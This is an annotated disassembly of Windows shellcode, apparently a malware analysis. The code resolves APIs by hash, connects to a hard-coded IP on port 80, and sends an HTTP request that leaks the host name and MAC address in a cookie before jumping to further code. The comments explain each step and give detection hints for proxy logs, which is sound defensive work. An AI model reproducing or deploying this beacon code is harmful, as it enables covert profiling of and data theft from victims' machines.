1. seg000:00000000 ; Segment type: Pure code
  2. seg000:00000000 seg000 segment byte public 'CODE' use32
  3. seg000:00000000 assume cs:seg000
  4. seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
  ; Entry point: save the registers, clear the direction flag for the string
  ; instructions used throughout, and transfer to sub_91. The call is used to
  ; obtain an address: sub_91 pops the return address (0x7) into ebp instead of
  ; returning to it.
  5. seg000:00000000 pusha
  6. seg000:00000001 cld ; lodsb/scasb/movsb below all count upward
  7. seg000:00000002 call sub_91 ; pushes 0x7, the address of the code that follows
  ; Hash-based import resolver. sub_91 reaches it with `call ebp` (ebp = 0x7).
  ; Stack on entry: [return address][32-bit hash][arguments for the API ...].
  ; It walks the list of loaded modules, hashes each module name and each export
  ; name with hash = ror(hash, 13) + byte, and tail-jumps to the export whose
  ; combined hash equals the requested value.
  ; The structure names in the comments are the usual 32-bit Windows layouts for
  ; these offsets (PEB, loader data, PE export directory); they are inferred from
  ; the offsets, not named anywhere in the listing.
  8. seg000:00000007 pusha ; the saved-EAX slot of this frame later receives the resolved address
  9. seg000:00000008 mov ebp, esp ; [ebp+20h] = caller's return address, [ebp+24h] = requested hash
  10. seg000:0000000A xor edx, edx
  11. seg000:0000000C mov edx, fs:[edx+30h] ; PEB pointer (TEB offset 30h)
  12. seg000:00000010 mov edx, [edx+0Ch] ; loader data
  13. seg000:00000013 mov edx, [edx+14h] ; first entry of the in-memory-order module list
  14. seg000:00000016
  15. seg000:00000016 loc_16: ; CODE XREF: seg000:0000008Ej
  16. seg000:00000016 mov esi, [edx+28h] ; module name buffer (UTF-16) -- presumably BaseDllName.Buffer
  17. seg000:00000019 movzx ecx, word ptr [edx+26h] ; number of bytes to hash -- presumably BaseDllName.MaximumLength
  18. seg000:0000001D xor edi, edi ; edi = running module-name hash
  19. seg000:0000001F
  20. seg000:0000001F loc_1F: ; CODE XREF: seg000:0000002Dj
  21. seg000:0000001F xor eax, eax
  22. seg000:00000021 lodsb ; every byte of the wide string is hashed individually
  23. seg000:00000022 cmp al, 61h ; 'a'
  24. seg000:00000024 jl short loc_28 ; below 'a' (signed compare): byte is hashed unchanged
  25. seg000:00000026 sub al, 20h ; ' ' -- fold to upper case so the hash ignores case
  26. seg000:00000028
  27. seg000:00000028 loc_28: ; CODE XREF: seg000:00000024j
  28. seg000:00000028 ror edi, 0Dh ; hash = ror(hash, 13) + byte
  29. seg000:0000002B add edi, eax
  30. seg000:0000002D loop loc_1F
  31. seg000:0000002F push edx ; [ebp-4] = current module list entry
  32. seg000:00000030 push edi ; [ebp-8] = module-name hash
  33. seg000:00000031 mov edx, [edx+10h] ; module base address
  34. seg000:00000034 mov eax, [edx+3Ch] ; offset of the PE header (e_lfanew)
  35. seg000:00000037 add eax, edx
  36. seg000:00000039 mov eax, [eax+78h] ; RVA of the export directory
  37. seg000:0000003C test eax, eax
  38. seg000:0000003E jz short loc_8A ; module exports nothing: try the next module
  39. seg000:00000040 add eax, edx ; eax = export directory address
  40. seg000:00000042 push eax ; kept on the stack until a name matches (or the module is exhausted)
  41. seg000:00000043 mov ecx, [eax+18h] ; NumberOfNames
  42. seg000:00000046 mov ebx, [eax+20h] ; AddressOfNames (RVA)
  43. seg000:00000049 add ebx, edx
  44. seg000:0000004B
  45. seg000:0000004B loc_4B: ; CODE XREF: seg000:00000067j
  46. seg000:0000004B jecxz short loc_89 ; every name tried, none matched
  47. seg000:0000004D dec ecx ; names are visited from the last index down to 0
  48. seg000:0000004E mov esi, [ebx+ecx*4] ; RVA of export name #ecx
  49. seg000:00000051 add esi, edx
  50. seg000:00000053 xor edi, edi ; edi = running export-name hash
  51. seg000:00000055
  52. seg000:00000055 loc_55: ; CODE XREF: seg000:0000005Fj
  53. seg000:00000055 xor eax, eax
  54. seg000:00000057 lodsb
  55. seg000:00000058 ror edi, 0Dh
  56. seg000:0000005B add edi, eax
  57. seg000:0000005D cmp al, ah ; ah is 0 here, so the loop ends after the terminating NUL has been hashed
  58. seg000:0000005F jnz short loc_55
  59. seg000:00000061 add edi, [ebp-8] ; combine with the module-name hash
  60. seg000:00000064 cmp edi, [ebp+24h] ; compare with the hash the caller pushed
  61. seg000:00000067 jnz short loc_4B
  62. seg000:00000069 pop eax ; export directory address
  63. seg000:0000006A mov ebx, [eax+24h] ; AddressOfNameOrdinals (RVA)
  64. seg000:0000006D add ebx, edx
  65. seg000:0000006F mov cx, [ebx+ecx*2] ; ordinal belonging to the matched name index
  66. seg000:00000073 mov ebx, [eax+1Ch] ; AddressOfFunctions (RVA)
  67. seg000:00000076 add ebx, edx
  68. seg000:00000078 mov eax, [ebx+ecx*4] ; function RVA
  69. seg000:0000007B add eax, edx ; eax = resolved function address
  70. seg000:0000007D mov [esp+24h], eax ; store into the saved-EAX slot (two dwords + pusha frame above esp)
  71. seg000:00000081 pop ebx ; discard the module-name hash
  72. seg000:00000082 pop ebx ; discard the module list entry
  73. seg000:00000083 popa ; registers restored, eax = resolved address
  74. seg000:00000084 pop ecx ; caller's return address
  75. seg000:00000085 pop edx ; drop the hash argument
  76. seg000:00000086 push ecx ; return address now sits directly above the API arguments
  77. seg000:00000087 jmp eax ; tail-jump: the API returns straight to the code after `call ebp`
  78. seg000:00000089 ; ---------------------------------------------------------------------------
  79. seg000:00000089
  80. seg000:00000089 loc_89: ; CODE XREF: seg000:loc_4Bj
  81. seg000:00000089 pop eax ; discard the export directory address
  82. seg000:0000008A
  83. seg000:0000008A loc_8A: ; CODE XREF: seg000:0000003Ej
  84. seg000:0000008A pop edi ; module-name hash (recomputed for the next module)
  85. seg000:0000008B pop edx ; current module list entry
  86. seg000:0000008C mov edx, [edx] ; follow the forward link to the next entry
  87. seg000:0000008E jmp short loc_16 ; NOTE(review): no end-of-list test is visible; behaviour for a hash that never matches is undefined from this listing
  88. seg000:0000008E ; ---------------------------------------------------------------------------
  89. seg000:00000090 dbCnt db 5 ; connect() attempt counter: decremented at 0x106 through [ebp+89h]; the retry loop stops when it reaches 0
  90. seg000:00000091
  91. seg000:00000091 ; =============== S U B R O U T I N E =======================================
  92. seg000:00000091
  93. seg000:00000091
  ; sub_91: main routine of the listing.
  ; `pop ebp` takes the return address of the call at 0x2, so ebp = 0x7. That value
  ; is used two ways: `call ebp` enters the hash resolver at 0x7, and every
  ; [ebp+X] operand addresses listing offset X+7 (e.g. [ebp+2E9h] -> 0x2F0).
  ; Visible flow:
  ;   1. load ws2_32 and IPHLPAPI, start Winsock, create a TCP socket;
  ;   2. connect to the sockaddr stored at 0x2E8, retrying while dbCnt is non-zero;
  ;   3. append the local host name after "Host: " and the hex hardware address
  ;      after "Cookie: ID=" in the request template at 0x2F0;
  ;   4. append the fixed header block, send the request, close the socket;
  ;   5. leave through `jmp edi` at loc_123 (also reached on every failure).
  ; The *_salt comments are the listing author's labels for the hash constants;
  ; the API named in each label is taken from those labels.
  ; Analyst note: the request puts the local machine name in the Host header and a
  ; 12-character upper-case hex value in the ID cookie, which is what to look for
  ; in proxy or packet logs.
  94. seg000:00000091 sub_91 proc near ; CODE XREF: seg000:00000002p
  95. seg000:00000091 pop ebp ; ebp = 0x7: resolver entry and data base
  96. seg000:00000092 cmp dword ptr [ebp+2E9h], 20544547h ; bytes at 0x2F0 must read "GET " (47 45 54 20)
  97. seg000:0000009C jnz short loc_10E ; template not present: skip all network activity
  98. seg000:0000009E lea eax, [ebp+2D1h] ; 0x2d8, ws2_32
  99. seg000:000000A4 push eax ; library name
  100. seg000:000000A5 push 726774Ch ; LoadLibraryA_salt
  101. seg000:000000AA call ebp
  102. seg000:000000AC test eax, eax
  103. seg000:000000AE jz short loc_10E ; library could not be loaded
  104. seg000:000000B0 lea eax, [ebp+2D8h] ; 0x2df,IPHLPAPI
  105. seg000:000000B6 push eax ; library name
  106. seg000:000000B7 push 726774Ch ; LoadLibraryA_salt
  107. seg000:000000BC call ebp
  108. seg000:000000BE test eax, eax
  109. seg000:000000C0 jz short loc_10E ; library could not be loaded
  110. seg000:000000C2 mov ebx, 190h ; 190h (400) serves as scratch size and as the version word below
  111. seg000:000000C7 sub esp, ebx ; scratch area that receives the startup data
  112. seg000:000000C9 push esp ; pointer to the scratch area
  113. seg000:000000CA push ebx ; requested version word (190h)
  114. seg000:000000CB push 6B8029h ; WSAStartup_salt
  115. seg000:000000D0 call ebp
  116. seg000:000000D2 add esp, ebx ; release the scratch area
  117. seg000:000000D4 test eax, eax
  118. seg000:000000D6 jnz short loc_10E ; non-zero result = failure
  119. seg000:000000D8 push eax ; 6th argument = 0 (eax is 0 after the successful call)
  120. seg000:000000D9 push eax ; 5th argument = 0
  121. seg000:000000DA push eax ; 4th argument = 0
  122. seg000:000000DB push eax ; 3rd argument, protocol = 0
  123. seg000:000000DC inc eax
  124. seg000:000000DD push eax ; 2nd argument, type = 1 (stream)
  125. seg000:000000DE inc eax
  126. seg000:000000DF push eax ; 1st argument, address family = 2 (AF_INET)
  127. seg000:000000E0 push 0E0DF0FEAh ; WSASocketA_salt
  128. seg000:000000E5 call ebp
  129. seg000:000000E7 xor ebx, ebx
  130. seg000:000000E9 not ebx ; ebx = 0FFFFFFFFh, the invalid-socket value
  131. seg000:000000EB cmp ebx, eax
  132. seg000:000000ED jz short loc_10E ; socket creation failed
  133. seg000:000000EF mov ebx, eax ; ebx = socket handle for the rest of the routine
  134. seg000:000000F1
  135. seg000:000000F1 loc_F1: ; CODE XREF: sub_91+7Bj
  136. seg000:000000F1 push 10h ; address length = 16
  137. seg000:000000F3 lea esi, [ebp+2E1h] ; sockaddr stored at 0x2E8
  138. seg000:000000F9 push esi
  139. seg000:000000FA push ebx ; socket
  140. seg000:000000FB push 6174A599h ; connect_salt
  141. seg000:00000100 call ebp
  142. seg000:00000102 test eax, eax
  143. seg000:00000104 jz short loc_125 ; 0 = connected
  144. seg000:00000106 dec byte ptr [ebp+89h] ; dbCnt -- the counter byte at 0x90 (initial value 5)
  145. seg000:0000010C jnz short loc_F1 ; try again until the counter reaches 0
  146. seg000:0000010E
  147. seg000:0000010E loc_10E: ; CODE XREF: sub_91+Bj
  148. seg000:0000010E ; sub_91+1Dj ...
  149. seg000:0000010E cmp byte ptr [ebp+24Fh], 1 ; flag byte at 0x256; set to 1 at 0x21D once the request has been built
  150. seg000:00000115 jz short loc_11E
  151. seg000:00000117 call sub_257 ; flag clear: append the header block first (sub_257 runs on into sub_270)
  152. seg000:0000011C jmp short loc_123
  153. seg000:0000011E ; ---------------------------------------------------------------------------
  154. seg000:0000011E
  155. seg000:0000011E loc_11E: ; CODE XREF: sub_91+84j
  156. seg000:0000011E call sub_270 ; edi = address one past the request string's NUL
  157. seg000:00000123
  158. seg000:00000123 loc_123: ; CODE XREF: sub_91+8Bj
  159. seg000:00000123 jmp edi ; continues in the bytes after the request's NUL -- presumably the copy of the stub at 0x2BD that sub_257 placed there
  160. seg000:00000125 ; ---------------------------------------------------------------------------
  161. seg000:00000125
  162. seg000:00000125 loc_125: ; CODE XREF: sub_91+73j
  163. seg000:00000125 mov eax, 100h
  164. seg000:0000012A sub esp, eax ; 256-byte stack buffer for the host name
  165. seg000:0000012C mov edx, esp
  166. seg000:0000012E push edx ; extra copy of the buffer pointer, recovered by `pop edi` below
  167. seg000:0000012F push eax ; buffer length = 100h
  168. seg000:00000130 push edx ; buffer
  169. seg000:00000131 push 1DE49B6h ; gethostname_salt
  170. seg000:00000136 call ebp
  171. seg000:00000138 pop edi ; edi = host name buffer
  172. seg000:00000139 add esp, 100h ; NOTE(review): the buffer is released here yet still read below, so it lies under esp from now on
  173. seg000:0000013F test eax, eax
  174. seg000:00000141 jnz loc_239 ; host name could not be obtained
  175. seg000:00000147 push edi
  176. seg000:00000148 call sub_246 ; ecx = length of the host name
  177. seg000:0000014D pop esi ; esi = host name
  178. seg000:0000014E mov edx, ecx ; edx = host name length
  179. seg000:00000150 lea edi, [ebp+2E9h] ; request template at 0x2F0
  180. seg000:00000156 call sub_246 ; edi = one past the template's NUL
  181. seg000:0000015B dec edi ; edi = the NUL itself, i.e. directly after "Host: "
  182. seg000:0000015C cmp edx, 20h ; ' '
  183. seg000:0000015F jl short loc_166
  184. seg000:00000161 mov edx, 20h ; ' ' -- at most 32 bytes of the host name are copied
  185. seg000:00000166
  186. seg000:00000166 loc_166: ; CODE XREF: sub_91+CEj
  187. seg000:00000166 mov ecx, edx
  188. seg000:00000168 push esi ; keep the host name pointer across the copy
  189. seg000:00000169 rep movsb ; append the host name after "Host: "
  190. seg000:0000016B mov ecx, 0Dh ; 13 bytes
  191. seg000:00000170 lea esi, [ebp+2C4h] ; 0x2CB: CR LF "Cookie: ID="
  192. seg000:00000176 rep movsb ; append the cookie prefix
  193. seg000:00000178 mov [ebp+24Bh], edi ; remember the write position in the dword at 0x252
  194. seg000:0000017E pop esi
  195. seg000:0000017F push esi ; argument: host name
  196. seg000:00000180 push 803428A9h ; gethostbyname_salt
  197. seg000:00000185 call ebp
  198. seg000:00000187 test eax, eax
  199. seg000:00000189 jz loc_239 ; lookup failed
  200. seg000:0000018F mov cx, [eax+0Ah] ; presumably the address-length field of the returned record
  201. seg000:00000193 cmp cx, 4
  202. seg000:00000197 jb loc_239 ; fewer than 4 address bytes: give up
  203. seg000:0000019D lea eax, [eax+0Ch] ; presumably the address-list field
  204. seg000:000001A0 mov eax, [eax] ; address list
  205. seg000:000001A2 mov ecx, [eax] ; first list entry
  206. seg000:000001A4 mov ecx, [ecx] ; ecx = first 4-byte address of this host
  207. seg000:000001A6 mov eax, 100h
  208. seg000:000001AB push eax ; length variable, initialised to 100h
  209. seg000:000001AC mov edi, esp ; edi = address of the length variable
  210. seg000:000001AE sub esp, eax ; 256-byte buffer for the hardware address
  211. seg000:000001B0 mov esi, esp ; esi = hardware address buffer
  212. seg000:000001B2 push edi ; 4th argument: pointer to the length
  213. seg000:000001B3 push esi ; 3rd argument: output buffer
  214. seg000:000001B4 push ecx ; 2nd argument: the host's own address
  215. seg000:000001B5 push ecx ; 1st argument: the same address again
  216. seg000:000001B6 push 0B8D27248h ; SendARP_salt
  217. seg000:000001BB call ebp
  218. seg000:000001BD test eax, eax ; NOTE(review): result unused -- the add on the next line overwrites the flags
  219. seg000:000001BF add esp, 104h ; release buffer and length variable (both are still read below)
  220. seg000:000001C5 movzx ecx, word ptr [edi] ; length written back by the call
  221. seg000:000001C8 cmp ecx, 6
  222. seg000:000001CB jb short loc_239 ; fewer than 6 address bytes: give up
  223. seg000:000001CD mov ecx, 6 ; exactly 6 bytes are converted
  224. seg000:000001D2 mov eax, 10h
  225. seg000:000001D7 sub esp, eax ; 16-byte buffer for the hex text
  226. seg000:000001D9 mov edi, esp
  227. seg000:000001DB mov edx, ecx
  228. seg000:000001DD shl edx, 1 ; 12 output characters
  229. seg000:000001DF push eax ; saved buffer size (10h), popped at 0x212
  230. seg000:000001E0 push edx ; saved text length (12), popped at 0x20D
  231. seg000:000001E1
  232. seg000:000001E1 loc_1E1: ; CODE XREF: sub_91+17Aj
  233. seg000:000001E1 xor edx, edx
  234. seg000:000001E3 mov dl, [esi] ; next address byte
  235. seg000:000001E5 mov al, dl
  236. seg000:000001E7 and al, 0F0h
  237. seg000:000001E9 shr al, 4 ; high nibble
  238. seg000:000001EC cmp al, 9
  239. seg000:000001EE ja short loc_1F4
  240. seg000:000001F0 add al, 30h ; '0'
  241. seg000:000001F2 jmp short loc_1F6
  242. seg000:000001F4 ; ---------------------------------------------------------------------------
  243. seg000:000001F4
  244. seg000:000001F4 loc_1F4: ; CODE XREF: sub_91+15Dj
  245. seg000:000001F4 add al, 37h ; '7' -- 10..15 become 'A'..'F'
  246. seg000:000001F6
  247. seg000:000001F6 loc_1F6: ; CODE XREF: sub_91+161j
  248. seg000:000001F6 mov [edi], al
  249. seg000:000001F8 inc edi
  250. seg000:000001F9 mov al, dl
  251. seg000:000001FB and al, 0Fh ; low nibble
  252. seg000:000001FD cmp al, 9
  253. seg000:000001FF ja short loc_205
  254. seg000:00000201 add al, 30h ; '0'
  255. seg000:00000203 jmp short loc_207
  256. seg000:00000205 ; ---------------------------------------------------------------------------
  257. seg000:00000205
  258. seg000:00000205 loc_205: ; CODE XREF: sub_91+16Ej
  259. seg000:00000205 add al, 37h ; '7' -- 10..15 become 'A'..'F'
  260. seg000:00000207
  261. seg000:00000207 loc_207: ; CODE XREF: sub_91+172j
  262. seg000:00000207 mov [edi], al
  263. seg000:00000209 inc edi
  264. seg000:0000020A inc esi
  265. seg000:0000020B loop loc_1E1
  266. seg000:0000020D pop ecx ; ecx = 12
  267. seg000:0000020E sub edi, ecx ; back to the start of the hex text
  268. seg000:00000210 mov esi, edi
  269. seg000:00000212 pop eax ; eax = 10h
  270. seg000:00000213 add esp, eax ; release the hex buffer (copied from immediately below)
  271. seg000:00000215 mov edi, [ebp+24Bh] ; write position saved at 0x178, right after "Cookie: ID="
  272. seg000:0000021B rep movsb ; append the 12 hex characters
  273. seg000:0000021D mov byte ptr [ebp+24Fh], 1 ; mark the request as built (flag byte at 0x256)
  274. seg000:00000224 call sub_257 ; append the header block; comes back with ecx = request length, edi = one past its NUL
  275. seg000:00000229 xor eax, eax
  276. seg000:0000022B push eax ; flags = 0
  277. seg000:0000022C push ecx ; length
  278. seg000:0000022D sub edi, ecx
  279. seg000:0000022F dec edi ; edi = start of the request
  280. seg000:00000230 push edi ; buffer
  281. seg000:00000231 push ebx ; socket
  282. seg000:00000232 push 5F38EBC2h ; send_salt
  283. seg000:00000237 call ebp
  284. seg000:00000239
  285. seg000:00000239 loc_239: ; CODE XREF: sub_91+B0j
  286. seg000:00000239 ; sub_91+F8j ...
  287. seg000:00000239 push ebx ; socket
  288. seg000:0000023A push 614D6E75h ; closesocket_salt
  289. seg000:0000023F call ebp
  290. seg000:00000241 jmp loc_10E ; shared exit path
  291. seg000:00000241 sub_91 endp ; sp-analysis failed
  292. seg000:00000241
  293. seg000:00000246
  294. seg000:00000246 ; =============== S U B R O U T I N E =======================================
  295. seg000:00000246
  296. seg000:00000246
  ; sub_246: length of a NUL-terminated byte string.
  ; In:  edi = start of the string (scan direction depends on DF, cleared at 0x1).
  ; Out: ecx = length without the NUL, edi = address one past the NUL, eax = 0.
  297. seg000:00000246 sub_246 proc near ; CODE XREF: sub_91+B7p
  298. seg000:00000246 ; sub_91+C5p ...
  299. seg000:00000246 xor ecx, ecx
  300. seg000:00000248 not ecx ; ecx = 0FFFFFFFFh: no upper bound on the scan
  301. seg000:0000024A xor eax, eax ; al = 0, the byte searched for
  302. seg000:0000024C repne scasb ; stop after the first zero byte
  303. seg000:0000024E not ecx ; number of bytes scanned, NUL included
  304. seg000:00000250 dec ecx ; exclude the NUL
  305. seg000:00000251 retn
  306. seg000:00000251 sub_246 endp
  307. seg000:00000251
  308. seg000:00000251 ; ---------------------------------------------------------------------------
  ; Scratch variables addressed relative to ebp (= 0x7) from sub_91.
  309. seg000:00000252 db 0 ; 0x252..0x255: dword [ebp+24Bh], request write position stored at 0x178
  310. seg000:00000253 db 0
  311. seg000:00000254 db 0
  312. seg000:00000255 db 0
  313. seg000:00000256 db 0 ; byte [ebp+24Fh]: "request built" flag, set at 0x21D and tested at 0x10E
  314. seg000:00000257
  315. seg000:00000257 ; =============== S U B R O U T I N E =======================================
  316. seg000:00000257
  317. seg000:00000257
  ; sub_257: append 4Fh bytes starting at 0x27C to the end of the request string
  ; at 0x2F0. That range is the 41h-byte header block plus the 0Eh bytes of code
  ; at 0x2BD. There is no retn here: execution continues into sub_270 at 0x270,
  ; whose retn returns to sub_257's caller.
  318. seg000:00000257 sub_257 proc near ; CODE XREF: sub_91+86p
  319. seg000:00000257 ; sub_91+193p
  320. seg000:00000257 lea edi, [ebp+2E9h] ; request string at 0x2F0
  321. seg000:0000025D call sub_246 ; edi = one past its NUL
  322. seg000:00000262 dec edi ; overwrite starting at the NUL
  323. seg000:00000263 mov ecx, 4Fh ; 'O' -- 79 bytes: headers (41h) + trailing code (0Eh)
  324. seg000:00000268 lea esi, [ebp+275h] ; source = 0x27C
  325. seg000:0000026E rep movsb
  326. seg000:0000026E sub_257 endp ; sp-analysis failed
  327. seg000:0000026E
  328. seg000:00000270
  329. seg000:00000270 ; =============== S U B R O U T I N E =======================================
  330. seg000:00000270
  331. seg000:00000270
  ; sub_270: measure the request string at 0x2F0.
  ; Out (from sub_246): ecx = length, edi = address one past the NUL, eax = 0.
  ; Also reached by fall-through from sub_257.
  332. seg000:00000270 sub_270 proc near ; CODE XREF: sub_91:loc_11Ep
  333. seg000:00000270 lea edi, [ebp+2E9h] ; request string at 0x2F0
  334. seg000:00000276 call sub_246
  335. seg000:0000027B retn
  336. seg000:0000027B sub_270 endp
  337. seg000:0000027B
  338. seg000:0000027B ; ---------------------------------------------------------------------------
  ; Fixed header block (41h bytes with the NUL) that sub_257 appends to the
  ; request. The header names, values and their order are constant in every request.
  339. seg000:0000027C aConnectionKeep db 0Dh,0Ah
  340. seg000:0000027C db 'Connection: keep-alive',0Dh,0Ah
  341. seg000:0000027C db 'Accept: */*',0Dh,0Ah
  342. seg000:0000027C db 'Accept-Encoding: gzip',0Dh,0Ah
  343. seg000:0000027C db 0Dh,0Ah,0 ; blank line ends the HTTP header section; the NUL ends the string
  344. seg000:000002BD ; ---------------------------------------------------------------------------
  ; 0Eh bytes of code that sub_257 copies together with the header block, so a copy
  ; ends up directly behind the request's NUL. Nothing in the listing branches to
  ; 0x2BD itself; the copy is presumably what `jmp edi` at 0x123 runs, with edi
  ; holding the copy's own address.
  345. seg000:000002BD add edi, 0Eh ; step over these 0Eh bytes
  346. seg000:000002C0 xor ecx, ecx
  347. seg000:000002C2 not ecx ; no upper bound on the scan
  348. seg000:000002C4 xor eax, eax ; al = 0
  349. seg000:000002C6 repe scasb ; skip zero bytes
  350. seg000:000002C8 dec edi ; back to the first non-zero byte
  351. seg000:000002C9 jmp edi ; continue there; what is stored at that address is not part of this listing
  352. seg000:000002C9 ; ---------------------------------------------------------------------------
  ; Data referenced from sub_91 through ebp-relative operands (listing offset = operand + 7).
  353. seg000:000002CB aCookieId db 0Dh,0Ah
  354. seg000:000002CB db 'Cookie: ID=' ; 13 bytes with the CR LF, appended at 0x176; the hex hardware address follows it
  355. seg000:000002D8 aWs2_32 db 'ws2_32',0 ; library name passed at 0x9E
  356. seg000:000002DF aIphlpapi db 'IPHLPAPI',0 ; library name passed at 0xB0
  357. seg000:000002E8 dd 50000002h ; start of the sockaddr used at 0xF3: bytes 02 00 = family 2, bytes 00 50 = port 80
  358. seg000:000002EC dd 36CADE41h ; address bytes 41 DE CA 36 = 65.222.202.54
  ; connect() is given a length of 10h, so the remaining 8 sockaddr bytes overlap the start of the text below.
  359. seg000:000002F0 aGet05cea4de951 db 'GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1',0Dh,0Ah
  360. seg000:000002F0 db 'Host: ',0 ; request template; the NUL is where sub_91 starts appending the host name
  361. seg000:0000032B db 0